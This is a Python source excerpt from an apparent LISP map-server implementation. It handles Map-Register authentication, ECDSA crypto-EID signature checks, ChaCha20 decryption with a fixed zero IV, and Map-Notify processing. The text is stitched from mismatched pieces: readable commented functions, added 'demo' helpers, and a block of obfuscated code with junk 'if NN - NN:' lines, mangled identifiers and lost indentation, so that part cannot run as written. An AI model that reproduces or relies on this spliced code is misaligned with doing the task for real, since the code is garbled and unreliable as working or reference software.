        # notify the existing RLE-nodes; otherwise notify the RTRs in the
        # registered RLOC-set.
        #
        notify_list = []
        notify_rtr = False
        if (site_eid.eid.address == 0 and site_eid.eid.mask_len == 0):
            addr_list = []
            rle_nodes = []
            if (len(rloc_set) != 0 and rloc_set[0].rle != None):
                rle_nodes = rloc_set[0].rle.rle_nodes

            for rle_node in rle_nodes:
                notify_list.append(rle_node.address)
                addr_list.append(rle_node.address.print_address_no_iid())

            lprint("Notify existing RLE-nodes {}".format(addr_list))
        else:
            for rloc_entry in rloc_set:
                if (rloc_entry.is_rtr()): notify_list.append(rloc_entry.rloc)

        #
        # If no RTRs registered the (S,G), notify the ITRs that registered
        # the unicast source EID.
        #
        notify_rtr = (len(notify_list) != 0)
        if (notify_rtr == False):
            usite_eid = lisp_site_eid_lookup(sg[0], null_group, False)
            if (usite_eid == None): continue

            for rloc_entry in usite_eid.registered_rlocs:
                if (rloc_entry.rloc.is_null()): continue
                notify_list.append(rloc_entry.rloc)

        #
        # Suppress the Map-Notify when there is nobody to send it to.
        #
        if (len(notify_list) == 0):
            lprint("No ITRs or RTRs found for {}, Map-Notify suppressed".\
                format(green(site_eid.print_eid_tuple(), False)))
            continue

        #
        # Send a Map-Notify to each ITR or RTR found.
        #
        for xtr in notify_list:
            lprint("Build Map-Notify to {}TR {} for {}".format(
                "R" if notify_rtr else "x",
                red(xtr.print_address_no_iid(), False),
                green(site_eid.print_eid_tuple(), False)))

            eid_list = [site_eid.print_eid_tuple()]
            lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list,
                xtr)
            time.sleep(.001)
    return

#
# lisp_find_sig_in_rloc_set
#
# Walk the RLOC-records of an EID-record and return the first one whose
# JSON payload carries a "signature" key, or None.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
    for i in range(rloc_count):
        rloc_record = lisp_rloc_record()
        packet = rloc_record.decode(packet, None)
        json_sig = rloc_record.json
        if (json_sig == None): continue

        try:
            json_sig = json.loads(json_sig.json_string)
        except:
            lprint("Found corrupted JSON signature")
            continue

        if ("signature" not in json_sig): continue
        return(rloc_record)
    return(None)

#
# lisp_get_eid_hash
#
# If the EID falls inside a configured crypto-EID prefix, return its
# hash portion (the low-order bits) as a colon-separated string,
# otherwise return None.
#
def lisp_get_eid_hash(eid):
    hash_mask_len = None
    for eid_prefix in lisp_eid_hashes:

        #
        # An instance-ID of -1 is a wildcard that matches any
        # instance-ID; temporarily borrow the EID's instance-ID.
        #
        iid = eid_prefix.instance_id
        if (iid == -1): eid_prefix.instance_id = eid.instance_id

        ms = eid.is_more_specific(eid_prefix)
        eid_prefix.instance_id = iid
        if (ms):
            hash_mask_len = 128 - eid_prefix.mask_len
            break

    if (hash_mask_len == None): return(None)

    #
    # Format the low-order hash_mask_len bits as colon-separated 16-bit
    # quartets, most-significant first.
    #
    address = eid.address
    eid_hash = ""
    for i in range(0, old_div(hash_mask_len, 16)):
        quartet = address & 0xffff
        quartet = hex(quartet)[2::]
        eid_hash = quartet.zfill(4) + ":" + eid_hash
        address >>= 16

    if (hash_mask_len % 16 != 0):
        octet = address & 0xff
        octet = hex(octet)[2::]
        eid_hash = octet.zfill(2) + ":" + eid_hash

    return(eid_hash[0:-1])
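
#
# demo_format_eid_hash
#
# Hedged worked example added for clarity; not part of the original
# lispers.net sources. It repeats the arithmetic of lisp_get_eid_hash()
# on a plain integer: the low-order hash_mask_len bits are emitted as
# colon-separated 16-bit quartets. The function name is hypothetical.
#
def demo_format_eid_hash(address, hash_mask_len):
    eid_hash = ""
    for i in range(0, hash_mask_len // 16):
        quartet = hex(address & 0xffff)[2::]
        eid_hash = quartet.zfill(4) + ":" + eid_hash
        address >>= 16

    # A trailing partial quartet is emitted as a single octet.
    if (hash_mask_len % 16 != 0):
        octet = hex(address & 0xff)[2::]
        eid_hash = octet.zfill(2) + ":" + eid_hash
    return(eid_hash[0:-1])

#
# For example, demo_format_eid_hash(0x1122334455667788, 64) returns
# "1122:3344:5566:7788".
#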

#
# lisp_lookup_public_key
#
# Look up the public key registered under the crypto-hashed form of the
# supplied EID. Returns [hash-eid, public-key, lookup-succeeded].
#
def lisp_lookup_public_key(eid):
    iid = eid.instance_id

    #
    # Get the hash from the crypto-EID to build the lookup key.
    #
    eid_hash = lisp_get_eid_hash(eid)
    if (eid_hash == None): return([None, None, False])

    eid_hash = "hash-" + eid_hash
    hash_eid = lisp_address(LISP_AFI_NAME, eid_hash, len(eid_hash), iid)
    group = lisp_address(LISP_AFI_NONE, "", 0, iid)

    #
    # Do the lookup in the site cache.
    #
    site_eid = lisp_site_eid_lookup(hash_eid, group, True)
    if (site_eid == None): return([hash_eid, None, False])

    #
    # Extract the public key from a "public-key" JSON RLOC-record.
    #
    pubkey = None
    for rloc in site_eid.registered_rlocs:
        json_pubkey = rloc.json
        if (json_pubkey == None): continue
        try:
            json_pubkey = json.loads(json_pubkey.json_string)
        except:
            lprint("Registered RLOC JSON format is invalid for {}".format(
                eid_hash))
            return([hash_eid, None, False])

        if ("public-key" not in json_pubkey): continue
        pubkey = json_pubkey["public-key"]
        break

    return([hash_eid, pubkey, True])

#
# lisp_verify_cga_sig
#
# Verify the ECDSA signature in an RLOC-record against the public key
# registered under the crypto-hashed signature-EID.
#
def lisp_verify_cga_sig(eid, rloc_record):

    #
    # Determine the signature-EID: it is the EID itself when the EID is a
    # crypto-EID, otherwise it comes from the "signature-eid" JSON key.
    #
    sig = json.loads(rloc_record.json.json_string)

    if (lisp_get_eid_hash(eid)):
        sig_eid = eid
    elif ("signature-eid" in sig):
        sig_eid_str = sig["signature-eid"]
        sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
    else:
        lprint("  No signature-eid found in RLOC-record")
        return(False)

    #
    # Look up the public key registered under the crypto-hashed EID.
    #
    hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
    if (hash_eid == None):
        eid_str = green(sig_eid.print_address(), False)
        lprint("  Could not parse hash in EID {}".format(eid_str))
        return(False)

    found = "found" if lookup_good else bold("not found", False)
    eid_str = green(hash_eid.print_address(), False)
    lprint("  Lookup for crypto-hashed EID {} {}".format(eid_str, found))
    if (lookup_good == False): return(False)

    if (pubkey == None):
        lprint("  RLOC-record with public-key not found")
        return(False)

    pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
    lprint("  RLOC-record with public-key '{}' found".format(pubkey_str))

    #
    # Base64-decode the signature from the JSON string.
    #
    sig_str = sig["signature"]
    try:
        sig_data = binascii.a2b_base64(sig_str)
    except:
        lprint("  Incorrect padding in signature string")
        return(False)

    sig_len = len(sig_data)
    if (sig_len & 1):
        lprint("  Signature length is odd, length {}".format(sig_len))
        return(False)

    #
    # The signature is computed over the printed signature-EID string.
    #
    sig_eid_str = sig_eid.print_address()

    #
    # Base64-decode the public key and load it as a PEM verifying key.
    #
    pubkey = binascii.a2b_base64(pubkey)
    try:
        key = ecdsa.VerifyingKey.from_pem(pubkey)
    except:
        bad = bold("Bad public-key", False)
        lprint("  {}, not in PEM format".format(bad))
        return(False)

    #
    # Verify the signature over the signature-EID with SHA-256.
    #
    try:
        good = key.verify(sig_data, sig_eid_str.encode(),
            hashfunc=hashlib.sha256)
    except:
        lprint("  Signature library failed for signature data '{}'".format(
            sig_eid_str))
        lprint("  Signature used '{}'".format(sig_str))
        return(False)

    return(good)
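
#
# demo_ecdsa_sign_and_verify
#
# Hedged sketch added for clarity; not part of the original lispers.net
# sources. It exercises the same python-ecdsa calls lisp_verify_cga_sig()
# depends on: a key generated with an assumed curve (NIST256p here) signs
# the printed signature-EID string, and VerifyingKey.verify() checks it
# with SHA-256, mirroring the verify() call above. All names are
# hypothetical.
#
def demo_ecdsa_sign_and_verify(sig_eid_str):
    import hashlib
    import ecdsa

    signing_key = ecdsa.SigningKey.generate(curve=ecdsa.NIST256p)
    verifying_key = signing_key.verifying_key

    # Sign the same data the verifier hashes: the printed EID string.
    signature = signing_key.sign(sig_eid_str.encode(),
        hashfunc=hashlib.sha256)

    try:
        return(verifying_key.verify(signature, sig_eid_str.encode(),
            hashfunc=hashlib.sha256))
    except ecdsa.BadSignatureError:
        return(False)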

#
# lisp_remove_eid_from_map_notify_queue
#
# If any EID in the supplied list has pending Map-Notify state, cancel
# its retransmit timer and remove the queue entry.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):

    #
    # Collect matching queue keys first; entries are removed after the
    # dictionary iteration completes.
    #
    remove_list = []
    for eid_tuple in eid_list:
        for nonce_key in lisp_map_notify_queue:
            map_notify = lisp_map_notify_queue[nonce_key]
            if (eid_tuple not in map_notify.eid_list): continue

            remove_list.append(nonce_key)
            timer = map_notify.retransmit_timer
            if (timer): timer.cancel()

            lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
                format(map_notify.nonce_key, green(eid_tuple, False)))

    #
    # Now remove the collected entries.
    #
    for nonce_key in remove_list: lisp_map_notify_queue.pop(nonce_key)
    return

#
# lisp_decrypt_map_register
#
# If the Map-Register is encrypted, decrypt its body with the configured
# ChaCha20 key selected by the key-id in the header.
#
def lisp_decrypt_map_register(packet):

    #
    # Examine the first 4 bytes: an encrypt bit and a 3-bit key-id.
    #
    header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
    encrypt_bit = (header >> 13) & 0x1
    if (encrypt_bit == 0): return(packet)

    key_id = (header >> 14) & 0x7

    #
    # Select the stored encryption key based on the key-id.
    #
    try:
        key = lisp_ms_encryption_keys[key_id]
        key = key.zfill(32)
        iv = "0" * 8
    except:
        lprint("Cannot decrypt Map-Register with key-id {}".format(key_id))
        return(None)

    d = bold("Decrypt", False)
    lprint("{} Map-Register with key-id {}".format(d, key_id))

    #
    # Decrypt everything after the first 4 header bytes.
    #
    decrypted = chacha.ChaCha(key, iv, 20).decrypt(packet[4::])
    return(packet[0:4] + decrypted)
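
#
# demo_chacha_roundtrip
#
# Hedged sketch added for clarity; not part of the original lispers.net
# sources. It assumes the same bundled "chacha" module used above and
# relies on ChaCha being a stream cipher: XORing with the keystream twice
# returns the original payload, so decrypt() both encrypts and decrypts.
# Key padding and the 8-byte IV mirror lisp_decrypt_map_register(); the
# function name is hypothetical.
#
def demo_chacha_roundtrip(key, payload):
    import chacha

    key = key.zfill(32)
    iv = "0" * 8
    ciphertext = chacha.ChaCha(key, iv, 20).decrypt(payload)
    return(chacha.ChaCha(key, iv, 20).decrypt(ciphertext))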
def lisp_process_map_register ( lisp_sockets , packet , source , sport ) :
global lisp_registered_count
if 93 - 93: OoooooooOO / o0oOOo0O0Ooo
if 61 - 61: II111iiii / i1IIi . I1ii11iIi11i % iIii1I11I1II1
if 66 - 66: iIii1I11I1II1 % OoOoOO00 + i1IIi * i11iIiiIii * OoooooooOO
if 36 - 36: iII111i - OoO0O00 + I1IiiI + Ii1I . OoooooooOO
if 75 - 75: oO0o * Oo0Ooo * O0
if 22 - 22: ooOoO0o / OoooooooOO . II111iiii / Ii1I * OoO0O00 . i1IIi
packet = lisp_decrypt_map_register ( packet )
if ( packet == None ) : return
if 62 - 62: oO0o % Ii1I - Ii1I
IIIiI111I = lisp_map_register ( )
i1o0o0oOO , packet = IIIiI111I . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Register packet" )
return
if 7 - 7: I1Ii111 / OoOoOO00 . II111iiii
IIIiI111I . sport = sport
if 9 - 9: I11i . I11i . OoooooooOO
IIIiI111I . print_map_register ( )
if 42 - 42: iII111i / oO0o / iII111i * OoO0O00
if 25 - 25: OoOoOO00 - II111iiii + II111iiii . Ii1I * II111iiii
if 12 - 12: IiII / Ii1I
if 54 - 54: Oo0Ooo + Ii1I % OoooooooOO * OOooOOo / OoOoOO00
iI1i1I111iI = True
if ( IIIiI111I . auth_len == LISP_SHA1_160_AUTH_DATA_LEN ) :
iI1i1I111iI = True
if 63 - 63: II111iiii + I1Ii111
if ( IIIiI111I . alg_id == LISP_SHA_256_128_ALG_ID ) :
iI1i1I111iI = False
if 19 - 19: I1ii11iIi11i
if 44 - 44: OoOoOO00 * Oo0Ooo
if 51 - 51: OOooOOo / IiII % I1Ii111 . OoOoOO00 % Ii1I
if 88 - 88: OoO0O00
if 28 - 28: I1Ii111 - iIii1I11I1II1
oO0oOOoo0OO0 = [ ]
if 25 - 25: iII111i / iII111i
if 7 - 7: II111iiii * Ii1I * OoO0O00 / o0oOOo0O0Ooo
if 71 - 71: ooOoO0o - i11iIiiIii - OoO0O00 % iII111i * OoooooooOO * OoooooooOO
if 44 - 44: OoO0O00 . OoOoOO00 + I1Ii111
I1io0oOOooOoo0oO = None
Oo0O0OO = packet
oo0OoO0OoOO0O = [ ]
oo0OOo00OOoO = IIIiI111I . record_count
for iIi1iIIIiIiI in range ( oo0OOo00OOoO ) :
o0o0Ooo0OO00o = lisp_eid_record ( )
ooOoooO = lisp_rloc_record ( )
packet = o0o0Ooo0OO00o . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Register packet" )
return
if 44 - 44: Oo0Ooo + oO0o + I1ii11iIi11i - iIii1I11I1II1 + Oo0Ooo + OoooooooOO
o0o0Ooo0OO00o . print_record ( " " , False )
if 96 - 96: O0 - Ii1I * Ii1I / OoO0O00 / II111iiii / ooOoO0o
if 48 - 48: ooOoO0o % I1IiiI + IiII * I1ii11iIi11i * I1IiiI % OoO0O00
if 79 - 79: i11iIiiIii + OOooOOo + oO0o * iIii1I11I1II1 % iII111i . I1Ii111
if 30 - 30: OoO0O00 / II111iiii
i1iI11i = lisp_site_eid_lookup ( o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group ,
False )
if 35 - 35: ooOoO0o * OOooOOo / I11i % I11i / OoooooooOO . I1Ii111
oOoOO000Oo0 = i1iI11i . print_eid_tuple ( ) if i1iI11i else None
if 49 - 49: I11i - OoooooooOO + i11iIiiIii
if 90 - 90: I1IiiI / I1Ii111 + Oo0Ooo / o0oOOo0O0Ooo + OOooOOo
if 99 - 99: i1IIi - oO0o
if 84 - 84: I1IiiI / IiII - OoO0O00 . Ii1I * IiII % Ii1I
if 57 - 57: I11i + iIii1I11I1II1 . II111iiii * oO0o
if 87 - 87: iII111i . II111iiii / Ii1I / O0 - oO0o
if 49 - 49: I1ii11iIi11i . OoOoOO00 / O0 * i1IIi * I1ii11iIi11i . o0oOOo0O0Ooo
if ( i1iI11i and i1iI11i . accept_more_specifics == False ) :
if ( i1iI11i . eid_record_matches ( o0o0Ooo0OO00o ) == False ) :
O0oOoO00O = i1iI11i . parent_for_more_specifics
if ( O0oOoO00O ) : i1iI11i = O0oOoO00O
if 95 - 95: OoO0O00 + O0 * oO0o
if 39 - 39: i1IIi
if 32 - 32: IiII . ooOoO0o / OoO0O00 / iII111i . iIii1I11I1II1 % IiII
if 28 - 28: I1Ii111 + OoooooooOO + IiII . ooOoO0o . I1IiiI / oO0o
if 66 - 66: Ii1I - I11i + Oo0Ooo . ooOoO0o
if 89 - 89: IiII . II111iiii / OoO0O00 + I1ii11iIi11i * i11iIiiIii
if 85 - 85: o0oOOo0O0Ooo - Oo0Ooo / I1Ii111
if 100 - 100: OoO0O00 * iIii1I11I1II1 - IiII . i1IIi % i11iIiiIii % Oo0Ooo
i1I1IiiIi = ( i1iI11i and i1iI11i . accept_more_specifics )
if ( i1I1IiiIi ) :
iI1i = lisp_site_eid ( i1iI11i . site )
iI1i . dynamic = True
iI1i . eid . copy_address ( o0o0Ooo0OO00o . eid )
iI1i . group . copy_address ( o0o0Ooo0OO00o . group )
iI1i . parent_for_more_specifics = i1iI11i
iI1i . add_cache ( )
iI1i . inherit_from_ams_parent ( )
i1iI11i . more_specific_registrations . append ( iI1i )
i1iI11i = iI1i
else :
i1iI11i = lisp_site_eid_lookup ( o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group ,
True )
if 23 - 23: OoO0O00 + I1IiiI / I1ii11iIi11i * I1ii11iIi11i % ooOoO0o
if 83 - 83: I1IiiI * i11iIiiIii - I1ii11iIi11i + I11i
i1iiii = o0o0Ooo0OO00o . print_eid_tuple ( )
if 33 - 33: OoO0O00 . OoooooooOO % iII111i / oO0o * Ii1I + ooOoO0o
if ( i1iI11i == None ) :
oo0oO0Oo = bold ( "Site not found" , False )
lprint ( " {} for EID {}{}" . format ( oo0oO0Oo , green ( i1iiii , False ) ,
", matched non-ams {}" . format ( green ( oOoOO000Oo0 , False ) if oOoOO000Oo0 else "" ) ) )
if 29 - 29: oO0o
if 21 - 21: i11iIiiIii . o0oOOo0O0Ooo
if 78 - 78: Oo0Ooo
if 77 - 77: oO0o % Oo0Ooo % O0
if 51 - 51: IiII % IiII + OOooOOo . II111iiii / I1ii11iIi11i
packet = ooOoooO . end_of_rlocs ( packet , o0o0Ooo0OO00o . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 4 - 4: o0oOOo0O0Ooo % I1IiiI * o0oOOo0O0Ooo * OoOoOO00 - Ii1I
continue
if 61 - 61: OoooooooOO - OoOoOO00 . O0 / ooOoO0o . Ii1I
if 41 - 41: Oo0Ooo / OoOoOO00 % I1Ii111 - O0
I1io0oOOooOoo0oO = i1iI11i . site
if 19 - 19: I1IiiI % I1Ii111 - O0 . iIii1I11I1II1 . I11i % O0
if ( i1I1IiiIi ) :
oO0ooOOO = i1iI11i . parent_for_more_specifics . print_eid_tuple ( )
lprint ( " Found ams {} for site '{}' for registering prefix {}" . format ( green ( oO0ooOOO , False ) , I1io0oOOooOoo0oO . site_name , green ( i1iiii , False ) ) )
if 88 - 88: ooOoO0o
else :
oO0ooOOO = green ( i1iI11i . print_eid_tuple ( ) , False )
lprint ( " Found {} for site '{}' for registering prefix {}" . format ( oO0ooOOO , I1io0oOOooOoo0oO . site_name , green ( i1iiii , False ) ) )
if 52 - 52: iIii1I11I1II1 % ooOoO0o * iIii1I11I1II1
if 20 - 20: i11iIiiIii * I11i
if 29 - 29: IiII / OOooOOo
if 39 - 39: O0 + II111iiii
if 94 - 94: OOooOOo % I1ii11iIi11i % O0 + iII111i
if 62 - 62: iIii1I11I1II1 . OoOoOO00 / iIii1I11I1II1 + IiII
if ( I1io0oOOooOoo0oO . shutdown ) :
lprint ( ( " Rejecting registration for site '{}', configured in " +
"admin-shutdown state" ) . format ( I1io0oOOooOoo0oO . site_name ) )
packet = ooOoooO . end_of_rlocs ( packet , o0o0Ooo0OO00o . rloc_count )
continue
        #
        # Look up the authentication key by key-id and verify the
        # Map-Register authentication hash.
        #
        IiII11iI1 = IIIiI111I.key_id
        if (IiII11iI1 in I1io0oOOooOoo0oO.auth_key):
            I1Ii1II1I11II = I1io0oOOooOoo0oO.auth_key[IiII11iI1]
        else:
            I1Ii1II1I11II = ""

        I1Iii1IIIiiiI = lisp_verify_auth(i1o0o0oOO, IIIiI111I.alg_id,
            IIIiI111I.auth_data, I1Ii1II1I11II)
        oOO00 = "dynamic " if i1iI11i.dynamic else ""

        Oo0oOO = bold("passed" if I1Iii1IIIiiiI else "failed", False)
        IiII11iI1 = "key-id {}".format(IiII11iI1) if IiII11iI1 == IIIiI111I.key_id \
            else "bad key-id {}".format(IIIiI111I.key_id)
        lprint(" Authentication {} for {}EID-prefix {}, {}".format(Oo0oOO,
            oOO00, green(i1iiii, False), IiII11iI1))

        #
        # When the EID carries a crypto-hash, or the site requires
        # signatures, find and verify the CGA signature in the RLOC-set.
        #
        Oo0OOoO0oO = True
        o00i1I11IIIi11I = (lisp_get_eid_hash(o0o0Ooo0OO00o.eid) != None)
        if (o00i1I11IIIi11I or i1iI11i.require_signature):
            OO0IIiI1Iiii11i = "Required " if i1iI11i.require_signature else ""
            i1iiii = green(i1iiii, False)
            iIIiI11 = lisp_find_sig_in_rloc_set(packet, o0o0Ooo0OO00o.rloc_count)
            if (iIIiI11 == None):
                Oo0OOoO0oO = False
                lprint((" {}EID-crypto-hash signature verification {} " +
                    "for EID-prefix {}, no signature found").format(
                    OO0IIiI1Iiii11i, bold("failed", False), i1iiii))
            else:
                Oo0OOoO0oO = lisp_verify_cga_sig(o0o0Ooo0OO00o.eid, iIIiI11)
                Oo0oOO = bold("passed" if Oo0OOoO0oO else "failed", False)
                lprint((" {}EID-crypto-hash signature verification {} " +
                    "for EID-prefix {}").format(OO0IIiI1Iiii11i, Oo0oOO, i1iiii))

        #
        # On authentication or signature failure, skip this EID-record's
        # RLOC-records and continue with the next record.
        #
        if (I1Iii1IIIiiiI == False or Oo0OOoO0oO == False):
            packet = ooOoooO.end_of_rlocs(packet, o0o0Ooo0OO00o.rloc_count)
            if (packet == None):
                lprint(" Could not decode RLOC-record in Map-Register packet")
                return
            continue
        #
        # Handle merge-register semantics. For merged registrations, keep
        # per-xTR state in individual_registrations, keyed by xtr-id.
        #
        if (IIIiI111I.merge_register_requested):
            O0oOoO00O = i1iI11i
            O0oOoO00O.inconsistent_registration = False

            #
            # A change in site-id resets the merged registration state for
            # unicast entries.
            #
            if (i1iI11i.group.is_null()):
                if (O0oOoO00O.site_id != IIIiI111I.site_id):
                    O0oOoO00O.site_id = IIIiI111I.site_id
                    O0oOoO00O.registered = False
                    O0oOoO00O.individual_registrations = {}
                    O0oOoO00O.registered_rlocs = []
                    lisp_registered_count -= 1

            III = IIIiI111I.xtr_id
            if (III in i1iI11i.individual_registrations):
                i1iI11i = i1iI11i.individual_registrations[III]
            else:
                i1iI11i = lisp_site_eid(I1io0oOOooOoo0oO)
                i1iI11i.eid.copy_address(O0oOoO00O.eid)
                i1iI11i.group.copy_address(O0oOoO00O.group)
                i1iI11i.encrypt_json = O0oOoO00O.encrypt_json
                O0oOoO00O.individual_registrations[III] = i1iI11i
        else:
            i1iI11i.inconsistent_registration = i1iI11i.merge_register_requested

        i1iI11i.map_registers_received += 1

        #
        # A Map-Register with record-ttl 0 is a deregistration; ignore it
        # when the source is not in the currently registered RLOC-set.
        #
        i1ii1ii11iIi = (i1iI11i.is_rloc_in_rloc_set(source) == False)
        if (o0o0Ooo0OO00o.record_ttl == 0 and i1ii1ii11iIi):
            lprint(" Ignore deregistration request from {}".format(
                red(source.print_address_no_iid(), False)))
            continue
        #
        # Save the old RLOC-set and decode the new one from the packet.
        #
        IiIi11Iii1Ii = i1iI11i.registered_rlocs
        i1iI11i.registered_rlocs = []

        O0O0oOOOoOoo = packet
        for I1I1II1iI in range(o0o0Ooo0OO00o.rloc_count):
            ooOoooO = lisp_rloc_record()
            packet = ooOoooO.decode(packet, None, i1iI11i.encrypt_json)
            if (packet == None):
                lprint(" Could not decode RLOC-record in Map-Register packet")
                return
            ooOoooO.print_record(" ")

            #
            # If the site has a configured allowed RLOC-set, reject the
            # registration when any RLOC is not in it.
            #
            if (len(I1io0oOOooOoo0oO.allowed_rlocs) > 0):
                O0O0 = ooOoooO.rloc.print_address()
                if (O0O0 not in I1io0oOOooOoo0oO.allowed_rlocs):
                    lprint((" Reject registration, RLOC {} not " +
                        "configured in allowed RLOC-set").format(red(O0O0,
                        False)))
                    i1iI11i.registered = False
                    packet = ooOoooO.end_of_rlocs(packet,
                        o0o0Ooo0OO00o.rloc_count - I1I1II1iI - 1)
                    break

            #
            # Store the RLOC from the RLOC-record.
            #
            iIIiI11 = lisp_rloc()
            iIIiI11.store_rloc_from_record(ooOoooO, None, source)

            #
            # Only honor the Map-Notify request bit for the RLOC the
            # Map-Register came from.
            #
            if (source.is_exact_match(iIIiI11.rloc)):
                iIIiI11.map_notify_requested = IIIiI111I.map_notify_requested

            i1iI11i.registered_rlocs.append(iIIiI11)

        iI1oooo = (i1iI11i.do_rloc_sets_match(IiIi11Iii1Ii) == False)

        #
        # A refreshing Map-Register is not allowed to change the RLOC-set.
        #
        if (IIIiI111I.map_register_refresh and iI1oooo and
            i1iI11i.registered):
            lprint(" Reject registration, refreshes cannot change RLOC-set")
            i1iI11i.registered_rlocs = IiIi11Iii1Ii
            continue

        #
        # First registration for this EID-prefix; timestamp it.
        #
        if (i1iI11i.registered == False):
            i1iI11i.first_registered = lisp_get_timestamp()
            lisp_registered_count += 1

        i1iI11i.last_registered = lisp_get_timestamp()
        i1iI11i.registered = (o0o0Ooo0OO00o.record_ttl != 0)
        i1iI11i.last_registerer = source
        #
        # Copy per-registration flags from the Map-Register into the
        # site-EID entry.
        #
        i1iI11i.auth_sha1_or_sha2 = iI1i1I111iI
        i1iI11i.proxy_reply_requested = IIIiI111I.proxy_reply_requested
        i1iI11i.lisp_sec_present = IIIiI111I.lisp_sec_present
        i1iI11i.map_notify_requested = IIIiI111I.map_notify_requested
        i1iI11i.mobile_node_requested = IIIiI111I.mobile_node
        i1iI11i.merge_register_requested = IIIiI111I.merge_register_requested

        i1iI11i.use_register_ttl_requested = IIIiI111I.use_ttl_for_timeout
        if (i1iI11i.use_register_ttl_requested):
            i1iI11i.register_ttl = o0o0Ooo0OO00o.store_ttl()
        else:
            i1iI11i.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3

        i1iI11i.xtr_id_present = IIIiI111I.xtr_id_present
        if (i1iI11i.xtr_id_present):
            i1iI11i.xtr_id = IIIiI111I.xtr_id
            i1iI11i.site_id = IIIiI111I.site_id

        #
        # Merge this registration into the parent entry and send a merged
        # Map-Notify when one was requested.
        #
        if (IIIiI111I.merge_register_requested):
            if (O0oOoO00O.merge_in_site_eid(i1iI11i)):
                oO0oOOoo0OO0.append([o0o0Ooo0OO00o.eid, o0o0Ooo0OO00o.group])
            if (IIIiI111I.map_notify_requested):
                lisp_send_merged_map_notify(lisp_sockets, O0oOoO00O, IIIiI111I,
                    o0o0Ooo0OO00o)

        if (iI1oooo == False): continue
        if (len(oO0oOOoo0OO0) != 0): continue

        oo0OoO0OoOO0O.append(i1iI11i.print_eid_tuple())
        #
        # The RLOC-set changed; build a Map-Notify and send it to each
        # member of the old RLOC-set that requested notifications.
        #
        iiiii11i = copy.deepcopy(o0o0Ooo0OO00o)
        o0o0Ooo0OO00o = o0o0Ooo0OO00o.encode()
        o0o0Ooo0OO00o += O0O0oOOOoOoo
        OoO0Oo0 = [i1iI11i.print_eid_tuple()]
        lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")

        for iIIiI11 in IiIi11Iii1Ii:
            if (iIIiI11.map_notify_requested == False): continue
            if (iIIiI11.rloc.is_exact_match(source)): continue
            lisp_build_map_notify(lisp_sockets, o0o0Ooo0OO00o, OoO0Oo0, 1,
                iIIiI11.rloc, LISP_CTRL_PORT, IIIiI111I.nonce, IIIiI111I.key_id,
                IIIiI111I.alg_id, IIIiI111I.auth_len, I1io0oOOooOoo0oO, False)

        #
        # Tell any pubsub subscribers about the changed RLOC-set.
        #
        lisp_notify_subscribers(lisp_sockets, iiiii11i, O0O0oOOOoOoo,
            i1iI11i.eid, I1io0oOOooOoo0oO)

    #
    # Send merged Map-Notifies for any multicast entries that changed.
    #
    if (len(oO0oOOoo0OO0) != 0):
        lisp_queue_multicast_map_notify(lisp_sockets, oO0oOOoo0OO0)

    #
    # Merged registrations do not get a regular Map-Notify.
    #
    if (IIIiI111I.merge_register_requested): return

    #
    # Send a Map-Notify back to the registerer when one was requested.
    #
    if (IIIiI111I.map_notify_requested and I1io0oOOooOoo0oO != None):
        lisp_build_map_notify(lisp_sockets, Oo0O0OO, oo0OoO0OoOO0O,
            IIIiI111I.record_count, source, sport, IIIiI111I.nonce,
            IIIiI111I.key_id, IIIiI111I.alg_id, IIIiI111I.auth_len,
            I1io0oOOooOoo0oO, True)
    return
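#
# lisp_process_unicast_map_notify
#
# Process a Map-Notify received on a unicast socket. Each EID-record is
# applied to a map-cache entry created by an earlier subscribe-request
# (pubsub); the entry's RLOC-set is replaced by the one in the packet.
#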
def lisp_process_unicast_map_notify(lisp_sockets, packet, source):
    i1111 = lisp_map_notify("")
    packet = i1111.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Notify packet")
        return

    i1111.print_notify()
    if (i1111.record_count == 0): return

    O00o0Oo = i1111.eid_records

    for iIi1iIIIiIiI in range(i1111.record_count):
        o0o0Ooo0OO00o = lisp_eid_record()
        O00o0Oo = o0o0Ooo0OO00o.decode(O00o0Oo)

        #
        # Check the decode result itself for failure.
        #
        if (O00o0Oo == None): return
        o0o0Ooo0OO00o.print_record(" ", False)
        i1iiii = o0o0Ooo0OO00o.print_eid_tuple()

        #
        # Only act on Map-Notifies for EIDs we have subscribed to.
        #
        I11iiI1III = lisp_map_cache_lookup(o0o0Ooo0OO00o.eid, o0o0Ooo0OO00o.eid)
        if (I11iiI1III == None):
            oO0ooOOO = green(i1iiii, False)
            lprint("Ignoring Map-Notify EID {}, no subscribe-request entry".
                format(oO0ooOOO))
            continue
        #
        # A map-cache entry that is not a pubsub placeholder must carry a
        # subscribed EID-prefix to be eligible for updates.
        #
        if (I11iiI1III.action != LISP_SEND_PUBSUB_ACTION):
            if (I11iiI1III.subscribed_eid == None):
                oO0ooOOO = green(i1iiii, False)
                lprint("Ignoring Map-Notify for non-subscribed EID {}".format(
                    oO0ooOOO))
                continue

        #
        # Replace a pubsub placeholder entry with a real mapping. Otherwise,
        # save the subscribed prefix and clear the old RLOC-set.
        #
        Iii11i1Ii = []
        if (I11iiI1III.action == LISP_SEND_PUBSUB_ACTION):
            I11iiI1III = lisp_mapping(o0o0Ooo0OO00o.eid, o0o0Ooo0OO00o.group, [])
            I11iiI1III.add_cache()
            o0oOOOOOO0OO = copy.deepcopy(o0o0Ooo0OO00o.eid)
            OOOo0Oooo = copy.deepcopy(o0o0Ooo0OO00o.group)
        else:
            o0oOOOOOO0OO = I11iiI1III.subscribed_eid
            OOOo0Oooo = I11iiI1III.subscribed_group
            Iii11i1Ii = I11iiI1III.rloc_set
            I11iiI1III.delete_rlocs_from_rloc_probe_list()
            I11iiI1III.rloc_set = []

